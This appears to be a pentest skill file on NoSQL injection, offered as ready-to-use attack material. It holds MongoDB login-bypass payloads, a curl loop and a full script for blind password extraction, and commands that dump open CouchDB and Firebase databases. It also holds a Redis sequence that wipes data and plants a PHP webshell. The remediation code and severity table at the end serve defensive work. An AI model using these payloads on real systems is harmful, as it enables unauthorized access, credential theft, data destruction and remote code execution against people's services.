nosqli
NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction.
| name | nosqli |
| description | NoSQL injection — MongoDB operator injection ($ne, $gt, $where, $regex), CouchDB / Firebase / Redis attack patterns, auth bypass, blind extraction. |
| metadata | {"when_to_use":"nosql mongodb mongo couch redis firebase $ne $gt $where injection","mitre_attack":"T1190, T1212","subdomain":"injection","upstream_ref":"skills/_corpus/payloads/NoSQL Injection/"} |
NoSQL stores parse JSON / native objects. When user input is bound into the query as an object rather than a plain value (an Express JSON body parser turns `{"$ne": null}` into a real object), the attacker controls query operators, not just the compared value, and control flows into the query itself.
```javascript
// Vulnerable: the request body is passed straight into the filter
db.users.findOne({user: req.body.user, pass: req.body.pass})
```

```http
POST /login
{"user": {"$ne": null}, "pass": {"$ne": null}}   // matches the first user in the collection
{"user": "admin", "pass": {"$gt": ""}}           // admin, if the stored password is any non-empty string (hash included)
{"user": "admin", "pass": {"$regex": "^A"}}      // blind char-by-char extraction of the stored value
{"$where": "this.user == 'admin' && sleep(5000)"}   // time-based, needs the whole body to become the filter
{"$where": "function() { return this.user.length > 0 && this.user.match(/^a/) }"}
```

$where runs server-side JavaScript inside mongod, so the two $where payloads only apply where the whole body (or an operator-capable key position) reaches the query. Server-side scripting can be turned off entirely (`security.javascriptEnabled: false` in mongod.conf); $where still appears in legacy code.
```bash
# Burp Intruder with a payload list, or a shell loop. This recovers the FIRST character only:
# extend the regex prefix with each confirmed character and repeat per position.
# A JSON body needs the Content-Type header or most body parsers ignore it.
for char in {a..z} {A..Z} {0..9}; do
  curl -s -X POST "$TARGET/login" \
    -H "Content-Type: application/json" \
    -d "{\"user\":\"admin\",\"pass\":{\"\$regex\":\"^${char}\"}}" \
    | grep -q "success" && echo "char: $char"
done
```
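The loop above stops at the first character. As an added example (not part of the original page), the function below carries the same $regex oracle through to a complete value: it escapes regex metacharacters so the confirmed prefix is matched literally, probes an alphabet per position, and terminates when an anchored `^prefix$` match succeeds. The backend, the user records and the alphabet are constructed here so it runs offline; in an engagement, `oracle` is replaced by a function that sends the filter and returns true on a "success" response.

```javascript
// Added example: blind, character-by-character extraction through a $regex oracle.
// No network: the vulnerable backend is simulated with constructed data.

const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!$_-.';

// Escape a literal so the confirmed prefix is matched as itself inside the regex.
function regexEscape(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Build the injected filter exactly as the server would receive it.
function buildPayload(user, knownPrefix, nextChar) {
  return { user, pass: { $regex: '^' + regexEscape(knownPrefix + nextChar) } };
}

// Simulated vulnerable backend: findOne({user, pass}) where pass may be an
// operator object. Constructed test data, not a real database.
const FAKE_DB = [
  { user: 'admin', pass: 'Tr0ub4dor!' },
  { user: 'bob', pass: 'hunter2' },
];

function simulatedLogin(filter) {
  return FAKE_DB.some(doc => {
    if (doc.user !== filter.user) return false;
    const p = filter.pass;
    if (typeof p === 'string') return doc.pass === p;
    if (p && typeof p.$regex === 'string') return new RegExp(p.$regex).test(doc.pass);
    return false;
  });
}

// Extract the stored value one character at a time. `oracle(filter)` must
// return true when the query matched (HTTP 200 / "success" body in the real case).
// Returns null when no alphabet character extends the prefix (widen ALPHABET).
function extractSecret(user, oracle, alphabet = ALPHABET, maxLen = 64) {
  let known = '';
  for (let i = 0; i < maxLen; i++) {
    // Anchored match on the full prefix means the value is complete.
    if (known && oracle({ user, pass: { $regex: '^' + regexEscape(known) + '$' } })) {
      return known;
    }
    const hit = alphabet.split('').find(c => oracle(buildPayload(user, known, c)));
    if (hit === undefined) return null;
    known += hit;
  }
  return known;
}

console.log(extractSecret('admin', simulatedLogin));
```

Each position costs at most one request per alphabet character plus one termination probe; a `$regex` character-class split (`^[a-m]`) halves that if request count matters. Whether the recovered string is a plaintext password or a hash depends on how the application stores it.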
```bash
# CouchDB "admin party": no admin account configured, so every request runs as admin (default port 5984)
curl http://target:5984/_all_dbs
curl http://target:5984/_users/_all_docs
# Then read/modify any document
```
```bash
# Public-read Realtime Database (most common misconfig): security rules contain ".read": true
curl https://YOUR-FIREBASE-PROJECT.firebaseio.com/.json
# Returns the entire database when the read rule is wide open
```
```bash
# Unauth Redis (still common on internal nets, occasionally exposed)
redis-cli -h target -p 6379 INFO
# Webshell via the RDB dump: needs CONFIG SET permitted and redis able to write into a web-served directory.
# FLUSHALL is destructive (wipes the keyspace): confirm rules of engagement first.
redis-cli -h target FLUSHALL
redis-cli -h target CONFIG SET dir /var/www/html
redis-cli -h target CONFIG SET dbfilename shell.php
redis-cli -h target SET payload '<?php system($_GET["c"]); ?>'
redis-cli -h target SAVE
# The PHP tag survives inside the binary RDB file, which the PHP interpreter still executes.
# (MODULE LOAD of an attacker-supplied .so is a separate RCE path, not shown here.)
```
```bash
# Mongo auth bypass via curl (nosqlmap.py automates the same probes)
curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": null}, "password": {"$ne": null}}' \
  | jq
# If the response is a logged-in admin session → critical
```
| Bug | Severity |
|---|---|
| Auth bypass via $ne | Critical 9.8 |
| Blind char extraction of all user data | Critical 9.0 |
| $where JS injection → RCE-adjacent (mongod runs the JS) | Critical 9.8 |
| Public CouchDB / Firebase | Critical (depends on data sensitivity) |
| Unauth Redis on internal net | High 7-8 |
```javascript
// 1. Type-check before the value reaches the query: injected operators arrive as objects, never strings
if (typeof req.body.user !== 'string') return res.status(400).send();
if (typeof req.body.pass !== 'string') return res.status(400).send();

// 2. Or pin the comparison: $eq (or Mongoose's sanitizeFilter, which wraps nested objects in $eq),
//    look the user up by name only, and verify the password hash in code, never inside the filter
mongoose.set('sanitizeFilter', true);
const u = await User.findOne({user: {$eq: req.body.user}}).select('+password');
// then: await bcrypt.compare(req.body.pass, u.password)

// 3. Disable server-side JavaScript ($where, mapReduce, $function) in mongod.conf:
//    security:
//      javascriptEnabled: false
// Note: mongoose.set('strictQuery', true) only drops filter keys that are not in the schema;
// it does not stop operator objects supplied for known fields.
```
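To make the remediation concrete, here is an added example (not code from the original page) that replays the operator payloads from the top of this page against a constructed user store through three query builders: the raw body, an `$eq`-wrapping sanitizer modelled on what Mongoose's `sanitizeFilter` and express-mongo-sanitize do, and a strict string-only login filter. The `matches` function emulates `findOne` semantics only for the operators this page covers ($eq, $ne, $gt, $regex); it is a teaching stand-in, not MongoDB.

```javascript
// Added example: operator injection versus two remediations, run offline against constructed data.

// Wrap any object-valued field in $eq so the client's {$ne: null} is compared as a literal
// document instead of being interpreted as an operator. Top-level operators are refused.
function sanitizeFilter(filter) {
  const out = {};
  for (const [key, value] of Object.entries(filter)) {
    if (key.startsWith('$')) {
      throw new Error(`top-level operator ${key} not allowed`); // blocks $where, $or, ...
    }
    out[key] = value !== null && typeof value === 'object' ? { $eq: value } : value;
  }
  return out;
}

// Stricter alternative for a login form: strings only, anything else is rejected.
function loginFilter(body) {
  const { user, pass } = body;
  if (typeof user !== 'string' || typeof pass !== 'string') return null;
  return { user, pass };
}

// Minimal stand-in for findOne() matching, limited to the operators discussed on this page.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    const v = doc[field];
    if (cond === null || typeof cond !== 'object') return v === cond;
    if ('$eq' in cond) return JSON.stringify(v) === JSON.stringify(cond.$eq);
    if ('$ne' in cond) return v !== cond.$ne;
    if ('$gt' in cond) return typeof v === 'string' && v > cond.$gt;
    if ('$regex' in cond) return typeof v === 'string' && new RegExp(cond.$regex).test(v);
    return false;
  });
}

const USERS = [{ user: 'admin', pass: 'S3cret!' }]; // constructed sample data

// mode: 'none' (vulnerable passthrough), 'eq' (sanitizeFilter), 'strict' (loginFilter)
// Returns the matched username, null for no match, or 'rejected' when input is refused.
function tryLogin(body, mode) {
  let filter = body;
  if (mode === 'eq') filter = sanitizeFilter(body);
  if (mode === 'strict') {
    filter = loginFilter(body);
    if (!filter) return 'rejected';
  }
  const hit = USERS.find(u => matches(u, filter));
  return hit ? hit.user : null;
}

const bypass = { user: { $ne: null }, pass: { $ne: null } };
console.log(tryLogin(bypass, 'none'), tryLogin(bypass, 'eq'), tryLogin(bypass, 'strict'));
```

The `$eq` wrapping is the general fix when the application legitimately needs to accept nested documents; the string-only filter is the right one for a login form, where no field should ever be an object.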